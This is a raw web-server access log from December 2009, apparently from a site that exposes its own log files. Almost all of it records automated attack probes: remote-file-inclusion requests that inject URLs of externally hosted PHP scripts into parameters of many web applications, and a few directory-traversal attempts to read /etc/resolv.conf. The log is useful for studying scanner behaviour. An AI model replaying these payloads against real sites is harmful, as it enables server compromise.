67.227.136.138 - - [16/Dec/2009:06:40:36 -0600] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 200 216797 "-""Mozilla/5.0"
121.125.67.213 - - [16/Dec/2009:06:41:18 -0600] "GET //skin/zero_vote/error.php?dir=http://khuplaza.com/khuplaza/bbs/icon/fx29id1.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
121.125.67.213 - - [16/Dec/2009:06:41:18 -0600] "GET /logs//skin/zero_vote/error.php?dir=http://khuplaza.com/khuplaza/bbs/icon/fx29id1.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
121.125.67.213 - - [16/Dec/2009:06:41:18 -0600] "GET /logs/access_log.1232323200//skin/zero_vote/error.php?dir=http://khuplaza.com/khuplaza/bbs/icon/fx29id1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
121.125.67.213 - - [16/Dec/2009:06:41:18 -0600] "GET /logs/access_log.1234224000//skin/zero_vote/error.php?dir=http://khuplaza.com/khuplaza/bbs/icon/fx29id1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
121.125.67.213 - - [16/Dec/2009:06:41:23 -0600] "GET //skin/zero_vote/error.php?dir=http://khuplaza.com/khuplaza/bbs/icon/fx29id1.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
121.125.67.213 - - [16/Dec/2009:06:41:23 -0600] "GET /logs/access_log.1232323200//skin/zero_vote/error.php?dir=http://khuplaza.com/khuplaza/bbs/icon/fx29id1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
121.125.67.213 - - [16/Dec/2009:06:41:23 -0600] "GET /logs//skin/zero_vote/error.php?dir=http://khuplaza.com/khuplaza/bbs/icon/fx29id1.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
121.125.67.213 - - [16/Dec/2009:06:41:23 -0600] "GET /logs/access_log.1234224000//skin/zero_vote/error.php?dir=http://khuplaza.com/khuplaza/bbs/icon/fx29id1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
121.125.67.213 - - [16/Dec/2009:06:41:24 -0600] "GET //skin/zero_vote/error.php?dir=http://khuplaza.com/khuplaza/bbs/icon/fx29id1.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
121.125.67.213 - - [16/Dec/2009:06:41:24 -0600] "GET /logs/access_log.1232323200//skin/zero_vote/error.php?dir=http://khuplaza.com/khuplaza/bbs/icon/fx29id1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
121.125.67.213 - - [16/Dec/2009:06:41:24 -0600] "GET /logs//skin/zero_vote/error.php?dir=http://khuplaza.com/khuplaza/bbs/icon/fx29id1.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
121.125.67.213 - - [16/Dec/2009:06:41:24 -0600] "GET /logs/access_log.1234224000//skin/zero_vote/error.php?dir=http://khuplaza.com/khuplaza/bbs/icon/fx29id1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
121.125.67.213 - - [16/Dec/2009:06:41:27 -0600] "GET //skin/zero_vote/error.php?dir=http://khuplaza.com/khuplaza/bbs/icon/fx29id1.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
121.125.67.213 - - [16/Dec/2009:06:41:27 -0600] "GET /logs//skin/zero_vote/error.php?dir=http://khuplaza.com/khuplaza/bbs/icon/fx29id1.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
121.125.67.213 - - [16/Dec/2009:06:41:27 -0600] "GET /logs/access_log.1232323200//skin/zero_vote/error.php?dir=http://khuplaza.com/khuplaza/bbs/icon/fx29id1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
121.125.67.213 - - [16/Dec/2009:06:41:27 -0600] "GET /logs/access_log.1234224000//skin/zero_vote/error.php?dir=http://khuplaza.com/khuplaza/bbs/icon/fx29id1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
121.125.67.213 - - [16/Dec/2009:06:42:17 -0600] "GET /logs//skin/zero_vote/error.php?dir=http://khuplaza.com/khuplaza/bbs/icon/fx29id1.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
121.125.67.213 - - [16/Dec/2009:06:42:17 -0600] "GET /logs/access_log.1232323200//skin/zero_vote/error.php?dir=http://khuplaza.com/khuplaza/bbs/icon/fx29id1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
121.125.67.213 - - [16/Dec/2009:06:42:17 -0600] "GET //skin/zero_vote/error.php?dir=http://khuplaza.com/khuplaza/bbs/icon/fx29id1.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
121.125.67.213 - - [16/Dec/2009:06:42:17 -0600] "GET /logs/access_log.1234224000//skin/zero_vote/error.php?dir=http://khuplaza.com/khuplaza/bbs/icon/fx29id1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
121.125.67.213 - - [16/Dec/2009:06:42:20 -0600] "GET /logs//skin/zero_vote/error.php?dir=http://khuplaza.com/khuplaza/bbs/icon/fx29id1.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
121.125.67.213 - - [16/Dec/2009:06:42:20 -0600] "GET //skin/zero_vote/error.php?dir=http://khuplaza.com/khuplaza/bbs/icon/fx29id1.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
121.125.67.213 - - [16/Dec/2009:06:42:20 -0600] "GET /logs/access_log.1232323200//skin/zero_vote/error.php?dir=http://khuplaza.com/khuplaza/bbs/icon/fx29id1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
121.125.67.213 - - [16/Dec/2009:06:42:20 -0600] "GET /logs/access_log.1234224000//skin/zero_vote/error.php?dir=http://khuplaza.com/khuplaza/bbs/icon/fx29id1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
121.125.67.213 - - [16/Dec/2009:06:42:27 -0600] "GET //skin/zero_vote/error.php?dir=http://khuplaza.com/khuplaza/bbs/icon/fx29id1.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
121.125.67.213 - - [16/Dec/2009:06:42:27 -0600] "GET /logs//skin/zero_vote/error.php?dir=http://khuplaza.com/khuplaza/bbs/icon/fx29id1.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
121.125.67.213 - - [16/Dec/2009:06:42:27 -0600] "GET /logs/access_log.1232323200//skin/zero_vote/error.php?dir=http://khuplaza.com/khuplaza/bbs/icon/fx29id1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
121.125.67.213 - - [16/Dec/2009:06:42:27 -0600] "GET /logs/access_log.1234224000//skin/zero_vote/error.php?dir=http://khuplaza.com/khuplaza/bbs/icon/fx29id1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
121.125.67.213 - - [16/Dec/2009:06:42:44 -0600] "GET //skin/zero_vote/error.php?dir=http://khuplaza.com/khuplaza/bbs/icon/fx29id1.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
121.125.67.213 - - [16/Dec/2009:06:42:44 -0600] "GET /logs//skin/zero_vote/error.php?dir=http://khuplaza.com/khuplaza/bbs/icon/fx29id1.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
121.125.67.213 - - [16/Dec/2009:06:42:44 -0600] "GET /logs/access_log.1232323200//skin/zero_vote/error.php?dir=http://khuplaza.com/khuplaza/bbs/icon/fx29id1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
121.125.67.213 - - [16/Dec/2009:06:42:45 -0600] "GET /logs/access_log.1234224000//skin/zero_vote/error.php?dir=http://khuplaza.com/khuplaza/bbs/icon/fx29id1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
64.40.103.14 - - [16/Dec/2009:06:42:50 -0600] "GET /logs/announcements.php?phpraid_dir=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 305 "-""-"
64.40.103.14 - - [16/Dec/2009:06:42:50 -0600] "GET /announcements.php?phpraid_dir=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 300 "-""-"
64.40.103.14 - - [16/Dec/2009:06:42:50 -0600] "GET /logs/announcements.php?phpraid_dir=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 305 "-""-"
64.40.103.14 - - [16/Dec/2009:06:42:50 -0600] "GET /announcements.php?phpraid_dir=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 300 "-""-"
70.38.64.117 - - [16/Dec/2009:06:43:38 -0600] "GET //skin/sirini_simplism_gallery_v4/setup.php?dir=http://www.jjdd.co.kr/nalog/fx29id1.txt???? HTTP/1.1" 404 325 "-""Mozilla/5.0"
70.38.64.117 - - [16/Dec/2009:06:43:38 -0600] "GET /logs/access_log.1257206400//skin/sirini_simplism_gallery_v4/setup.php?dir=http://www.jjdd.co.kr/nalog/fx29id1.txt???? HTTP/1.1" 404 352 "-""Mozilla/5.0"
70.38.64.117 - - [16/Dec/2009:06:43:38 -0600] "GET /logs//skin/sirini_simplism_gallery_v4/setup.php?dir=http://www.jjdd.co.kr/nalog/fx29id1.txt???? HTTP/1.1" 404 330 "-""Mozilla/5.0"
70.38.64.117 - - [16/Dec/2009:06:44:29 -0600] "GET /logs//skin/sirini_simplism_gallery_v4/setup.php?dir=http://www.jjdd.co.kr/nalog/fx29id1.txt???? HTTP/1.1" 404 330 "-""Mozilla/5.0"
70.38.64.117 - - [16/Dec/2009:06:44:29 -0600] "GET /logs/access_log.1253577600//skin/sirini_simplism_gallery_v4/setup.php?dir=http://www.jjdd.co.kr/nalog/fx29id1.txt???? HTTP/1.1" 404 352 "-""Mozilla/5.0"
70.38.64.117 - - [16/Dec/2009:06:44:32 -0600] "GET //skin/sirini_simplism_gallery_v4/setup.php?dir=http://www.jjdd.co.kr/nalog/fx29id1.txt???? HTTP/1.1" 404 325 "-""Mozilla/5.0"
70.38.64.117 - - [16/Dec/2009:06:44:41 -0600] "GET /logs/access_log.1250899200//skin/sirini_simplism_gallery_v4/setup.php?dir=http://www.jjdd.co.kr/nalog/fx29id1.txt???? HTTP/1.1" 404 352 "-""Mozilla/5.0"
70.38.31.183 - - [16/Dec/2009:06:48:20 -0600] "GET /logs/errors.php?error=http://www.kcs1959.com/public_html/system//data/templates/sken/id1(pirates).txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
70.38.31.183 - - [16/Dec/2009:06:48:20 -0600] "GET /errors.php?error=http://www.kcs1959.com/public_html/system//data/templates/sken/id1(pirates).txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
70.38.31.183 - - [16/Dec/2009:06:48:39 -0600] "GET /logs/access_log.1233014400/errors.php?error=http://www.kcs1959.com/public_html/system//data/templates/sken/id1(pirates).txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
70.38.31.183 - - [16/Dec/2009:06:49:05 -0600] "GET /errors.php?error=http://www.kcs1959.com/public_html/system//data/templates/sken/id1(pirates).txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
70.38.31.183 - - [16/Dec/2009:06:49:07 -0600] "GET /logs/errors.php?error=http://www.kcs1959.com/public_html/system//data/templates/sken/id1(pirates).txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
70.38.31.183 - - [16/Dec/2009:06:49:25 -0600] "GET /logs/access_log.1233014400/errors.php?error=http://www.kcs1959.com/public_html/system//data/templates/sken/id1(pirates).txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
124.49.100.254 - - [16/Dec/2009:06:50:31 -0600] "GET /logs/admincp.php?rootpath=http://www.luckstone.kr/ams/amboard3/zx/id1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
124.49.100.254 - - [16/Dec/2009:06:50:31 -0600] "GET /admincp.php?rootpath=http://www.luckstone.kr/ams/amboard3/zx/id1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
124.49.100.254 - - [16/Dec/2009:06:50:31 -0600] "GET /logs/access_log.1242345600/admincp.php?rootpath=http://www.luckstone.kr/ams/amboard3/zx/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
124.49.100.254 - - [16/Dec/2009:06:50:31 -0600] "GET /logs/access_log.1252195200/admincp.php?rootpath=http://www.luckstone.kr/ams/amboard3/zx/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
74.81.68.114 - - [16/Dec/2009:06:50:48 -0600] "GET //components/com_simpleboard/image_upload.php?sbp=http://netcourse.xjtu.edu.cn/id? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
65.18.192.91 - - [16/Dec/2009:06:51:23 -0600] "GET ///skin/ggaggo_pds/setup.php?dir=http://www.soraperra.com/canazeiinforma/open.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
65.18.192.91 - - [16/Dec/2009:06:51:23 -0600] "GET /logs///skin/ggaggo_pds/setup.php?dir=http://www.soraperra.com/canazeiinforma/open.txt??? HTTP/1.1" 404 315 "-""Mozilla/5.0"
65.18.192.91 - - [16/Dec/2009:06:51:23 -0600] "GET /logs/access_log.1256515200///skin/ggaggo_pds/setup.php?dir=http://www.soraperra.com/canazeiinforma/open.txt??? HTTP/1.1" 404 337 "-""Mozilla/5.0"
65.18.192.91 - - [16/Dec/2009:06:51:44 -0600] "GET /logs/access_log.1256601600///skin/ggaggo_pds/setup.php?dir=http://www.soraperra.com/canazeiinforma/open.txt??? HTTP/1.1" 404 337 "-""Mozilla/5.0"
202.88.229.100 - - [16/Dec/2009:06:51:59 -0600] "GET /logs/access_log.1232064000//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.ezonplaza.com/img/id1.txt? HTTP/1.1" 404 375 "-""Mozilla/5.0"
202.88.229.100 - - [16/Dec/2009:06:52:00 -0600] "GET //technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.ezonplaza.com/img/id1.txt? HTTP/1.1" 404 348 "-""Mozilla/5.0"
202.88.229.100 - - [16/Dec/2009:06:52:00 -0600] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.ezonplaza.com/img/id1.txt? HTTP/1.1" 404 353 "-""Mozilla/5.0"
202.88.229.100 - - [16/Dec/2009:06:52:00 -0600] "GET /logs/access_log.1230768000//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.ezonplaza.com/img/id1.txt? HTTP/1.1" 404 375 "-""Mozilla/5.0"
202.88.229.100 - - [16/Dec/2009:06:52:05 -0600] "GET /logs/access_log.1232064000//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.ezonplaza.com/img/id1.txt? HTTP/1.1" 404 375 "-""Mozilla/5.0"
202.88.229.100 - - [16/Dec/2009:06:52:05 -0600] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.ezonplaza.com/img/id1.txt? HTTP/1.1" 404 353 "-""Mozilla/5.0"
202.88.229.100 - - [16/Dec/2009:06:52:05 -0600] "GET //technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.ezonplaza.com/img/id1.txt? HTTP/1.1" 404 348 "-""Mozilla/5.0"
202.88.229.100 - - [16/Dec/2009:06:52:05 -0600] "GET /logs/access_log.1230768000//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.ezonplaza.com/img/id1.txt? HTTP/1.1" 404 375 "-""Mozilla/5.0"
70.38.31.183 - - [16/Dec/2009:06:52:17 -0600] "GET /logs/access_log.1231718400/errors.php?error=http://www.kcs1959.com/public_html/system//data/templates/sken/id1(pirates).txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
70.38.31.183 - - [16/Dec/2009:06:52:53 -0600] "GET /logs/access_log.1231718400/errors.php?error=http://www.kcs1959.com/public_html/system//data/templates/sken/id1(pirates).txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
65.55.207.99 - - [16/Dec/2009:06:56:01 -0600] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.227.136.138 - - [16/Dec/2009:06:56:14 -0600] "GET /index.php?canal=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 292 "-""Mozilla/5.0"
67.227.136.138 - - [16/Dec/2009:06:56:14 -0600] "GET /logs/access_log.1255564800/index.php?canal=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 319 "-""Mozilla/5.0"
67.227.136.138 - - [16/Dec/2009:06:56:14 -0600] "GET /logs/index.php?canal=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 297 "-""Mozilla/5.0"
67.227.136.138 - - [16/Dec/2009:06:56:31 -0600] "GET /index.php?canal=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 292 "-""Mozilla/5.0"
67.227.136.138 - - [16/Dec/2009:06:56:31 -0600] "GET /logs/index.php?canal=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 297 "-""Mozilla/5.0"
67.227.136.138 - - [16/Dec/2009:06:56:31 -0600] "GET /logs/access_log.1255564800/index.php?canal=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 319 "-""Mozilla/5.0"
70.38.31.183 - - [16/Dec/2009:06:56:43 -0600] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.kcs1959.com/public_html/system//data/templates/sken/id1(pirates).txt? HTTP/1.1" 404 297 "-""Mozilla/5.0"
70.38.31.183 - - [16/Dec/2009:06:56:43 -0600] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.kcs1959.com/public_html/system//data/templates/sken/id1(pirates).txt? HTTP/1.1" 404 292 "-""Mozilla/5.0"
70.38.31.183 - - [16/Dec/2009:06:56:43 -0600] "GET /logs/access_log.1248825600/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.kcs1959.com/public_html/system//data/templates/sken/id1(pirates).txt? HTTP/1.1" 404 319 "-""Mozilla/5.0"
70.38.31.183 - - [16/Dec/2009:06:57:08 -0600] "GET /logs/access_log.1250899200/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.kcs1959.com/public_html/system//data/templates/sken/id1(pirates).txt? HTTP/1.1" 404 319 "-""Mozilla/5.0"
65.55.207.99 - - [16/Dec/2009:06:57:08 -0600] "GET /logs/access_log.1244505600 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
74.86.82.218 - - [16/Dec/2009:06:58:19 -0600] "GET /logs/drupal/?_menu[callbacks][1][callback]=http://netafreelancer.com/Script-Directory/templates/hbb.txt?&mode=id HTTP/1.1" 404 295 "-""-"
66.249.71.83 - - [16/Dec/2009:06:59:34 -0600] "GET /logs/access_log.1237161600 HTTP/1.1" 200 272432 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.18.20.210 - - [16/Dec/2009:07:00:49 -0600] "GET /logs///////////////setup.php?dir=http://www.luckstone.kr/ams/amboard3/zx/id1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
216.18.20.210 - - [16/Dec/2009:07:00:49 -0600] "GET ///////////////setup.php?dir=http://www.luckstone.kr/ams/amboard3/zx/id1.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
216.18.20.210 - - [16/Dec/2009:07:00:49 -0600] "GET /logs/access_log.1255651200///////////////setup.php?dir=http://www.luckstone.kr/ams/amboard3/zx/id1.txt?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
216.18.20.210 - - [16/Dec/2009:07:00:49 -0600] "GET /logs/access_log.1256774400///////////////setup.php?dir=http://www.luckstone.kr/ams/amboard3/zx/id1.txt?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
67.227.136.138 - - [16/Dec/2009:07:00:49 -0600] "GET /index_principal.php?pagina=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 302 "-""Mozilla/5.0"
67.227.136.138 - - [16/Dec/2009:07:00:49 -0600] "GET /logs/index_principal.php?pagina=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 307 "-""Mozilla/5.0"
67.227.136.138 - - [16/Dec/2009:07:00:49 -0600] "GET /logs/access_log.1253923200/index_principal.php?pagina=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 329 "-""Mozilla/5.0"
67.227.136.138 - - [16/Dec/2009:07:00:49 -0600] "GET /logs/access_log.1255219200/index_principal.php?pagina=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 329 "-""Mozilla/5.0"
125.245.165.135 - - [16/Dec/2009:07:00:49 -0600] "GET ///skin/ggambo1080_image/setup.php?dir=http://www.soraperra.com/canazeiinforma/open.txt??? HTTP/1.1" 404 316 "-""Mozilla/5.0"
125.245.165.135 - - [16/Dec/2009:07:00:49 -0600] "GET /logs///skin/ggambo1080_image/setup.php?dir=http://www.soraperra.com/canazeiinforma/open.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
125.245.165.135 - - [16/Dec/2009:07:00:49 -0600] "GET /logs/access_log.1249257600///skin/ggambo1080_image/setup.php?dir=http://www.soraperra.com/canazeiinforma/open.txt??? HTTP/1.1" 404 343 "-""Mozilla/5.0"
110.45.147.248 - - [16/Dec/2009:07:00:50 -0600] "GET /logs/access_log.1253059200/template.php?name=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 322 "-""Mozilla/5.0"
110.45.147.248 - - [16/Dec/2009:07:00:50 -0600] "GET /template.php?name=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 295 "-""Mozilla/5.0"
110.45.147.248 - - [16/Dec/2009:07:00:50 -0600] "GET /logs/template.php?name=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 300 "-""Mozilla/5.0"
110.45.147.248 - - [16/Dec/2009:07:00:50 -0600] "GET /logs/access_log.1252627200/template.php?name=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 322 "-""Mozilla/5.0"
216.18.20.210 - - [16/Dec/2009:07:00:51 -0600] "GET /logs///////////////setup.php?dir=http://www.luckstone.kr/ams/amboard3/zx/id1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
216.18.20.210 - - [16/Dec/2009:07:00:51 -0600] "GET ///////////////setup.php?dir=http://www.luckstone.kr/ams/amboard3/zx/id1.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
216.18.20.210 - - [16/Dec/2009:07:00:51 -0600] "GET /logs/access_log.1256774400///////////////setup.php?dir=http://www.luckstone.kr/ams/amboard3/zx/id1.txt?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
216.18.20.210 - - [16/Dec/2009:07:00:51 -0600] "GET /logs/access_log.1255651200///////////////setup.php?dir=http://www.luckstone.kr/ams/amboard3/zx/id1.txt?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
67.227.136.138 - - [16/Dec/2009:07:00:52 -0600] "GET /index_principal.php?pagina=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 302 "-""Mozilla/5.0"
67.227.136.138 - - [16/Dec/2009:07:00:52 -0600] "GET /logs/index_principal.php?pagina=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 307 "-""Mozilla/5.0"
67.227.136.138 - - [16/Dec/2009:07:00:52 -0600] "GET /logs/access_log.1253923200/index_principal.php?pagina=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 329 "-""Mozilla/5.0"
67.227.136.138 - - [16/Dec/2009:07:00:52 -0600] "GET /logs/access_log.1255219200/index_principal.php?pagina=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 329 "-""Mozilla/5.0"
81.177.26.62 - - [16/Dec/2009:07:01:06 -0600] "GET /logs/access_log.1232323200///?_PHPLIB[libdir]=http://n34.biz/id1.txt??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
81.177.26.62 - - [16/Dec/2009:07:01:06 -0600] "GET ///?_PHPLIB[libdir]=http://n34.biz/id1.txt??? HTTP/1.1" 200 3246 "-""Mozilla/5.0"
81.177.26.62 - - [16/Dec/2009:07:01:06 -0600] "GET /logs/access_log.1236470400///?_PHPLIB[libdir]=http://n34.biz/id1.txt??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
81.177.26.62 - - [16/Dec/2009:07:01:08 -0600] "GET /logs///?_PHPLIB[libdir]=http://n34.biz/id1.txt??? HTTP/1.1" 200 216797 "-""Mozilla/5.0"
125.245.165.135 - - [16/Dec/2009:07:01:28 -0600] "GET /logs/access_log.1252972800///skin/ggambo1080_image/setup.php?dir=http://www.soraperra.com/canazeiinforma/open.txt??? HTTP/1.1" 404 343 "-""Mozilla/5.0"
70.38.31.183 - - [16/Dec/2009:07:01:34 -0600] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.kcs1959.com/public_html/system//data/templates/sken/id1(pirates).txt? HTTP/1.1" 404 292 "-""Mozilla/5.0"
70.38.31.183 - - [16/Dec/2009:07:01:34 -0600] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.kcs1959.com/public_html/system//data/templates/sken/id1(pirates).txt? HTTP/1.1" 404 297 "-""Mozilla/5.0"
70.38.31.183 - - [16/Dec/2009:07:01:49 -0600] "GET /logs/access_log.1250899200/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.kcs1959.com/public_html/system//data/templates/sken/id1(pirates).txt? HTTP/1.1" 404 319 "-""Mozilla/5.0"
70.38.31.183 - - [16/Dec/2009:07:02:07 -0600] "GET /logs/access_log.1248825600/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.kcs1959.com/public_html/system//data/templates/sken/id1(pirates).txt? HTTP/1.1" 404 319 "-""Mozilla/5.0"
216.18.20.210 - - [16/Dec/2009:07:02:14 -0600] "GET /logs/access_log.1256860800///////////////setup.php?dir=http://www.luckstone.kr/ams/amboard3/zx/id1.txt?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
125.245.165.135 - - [16/Dec/2009:07:02:16 -0600] "GET ///skin/ggambo1080_image/setup.php?dir=http://www.soraperra.com/canazeiinforma/open.txt??? HTTP/1.1" 404 316 "-""Mozilla/5.0"
125.245.165.135 - - [16/Dec/2009:07:02:16 -0600] "GET /logs///skin/ggambo1080_image/setup.php?dir=http://www.soraperra.com/canazeiinforma/open.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
125.245.165.135 - - [16/Dec/2009:07:02:16 -0600] "GET /logs/access_log.1249257600///skin/ggambo1080_image/setup.php?dir=http://www.soraperra.com/canazeiinforma/open.txt??? HTTP/1.1" 404 343 "-""Mozilla/5.0"
216.18.20.210 - - [16/Dec/2009:07:02:28 -0600] "GET /logs/access_log.1256860800///////////////setup.php?dir=http://www.luckstone.kr/ams/amboard3/zx/id1.txt?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
125.245.165.135 - - [16/Dec/2009:07:02:56 -0600] "GET /logs/access_log.1252972800///skin/ggambo1080_image/setup.php?dir=http://www.soraperra.com/canazeiinforma/open.txt??? HTTP/1.1" 404 343 "-""Mozilla/5.0"
221.143.42.249 - - [16/Dec/2009:07:05:27 -0600] "GET /logs/access_log.1233014400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.harrisonchildrendentist.com/cp/fx29id1.txt?? HTTP/1.1" 404 364 "-""Mozilla/5.0"
221.143.42.249 - - [16/Dec/2009:07:05:27 -0600] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.harrisonchildrendentist.com/cp/fx29id1.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
221.143.42.249 - - [16/Dec/2009:07:05:27 -0600] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.harrisonchildrendentist.com/cp/fx29id1.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
216.18.20.210 - - [16/Dec/2009:07:05:40 -0600] "GET /logs/index_principal.php?pagina=http://www.luckstone.kr/ams/amboard3/zx/id1.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
216.18.20.210 - - [16/Dec/2009:07:05:40 -0600] "GET /logs/access_log.1253145600/index_principal.php?pagina=http://www.luckstone.kr/ams/amboard3/zx/id1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
216.18.20.210 - - [16/Dec/2009:07:05:40 -0600] "GET /logs/access_log.1253923200/index_principal.php?pagina=http://www.luckstone.kr/ams/amboard3/zx/id1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
216.18.20.210 - - [16/Dec/2009:07:05:40 -0600] "GET /index_principal.php?pagina=http://www.luckstone.kr/ams/amboard3/zx/id1.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
221.143.42.249 - - [16/Dec/2009:07:05:55 -0600] "GET /logs/access_log.1231718400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.harrisonchildrendentist.com/cp/fx29id1.txt?? HTTP/1.1" 404 364 "-""Mozilla/5.0"
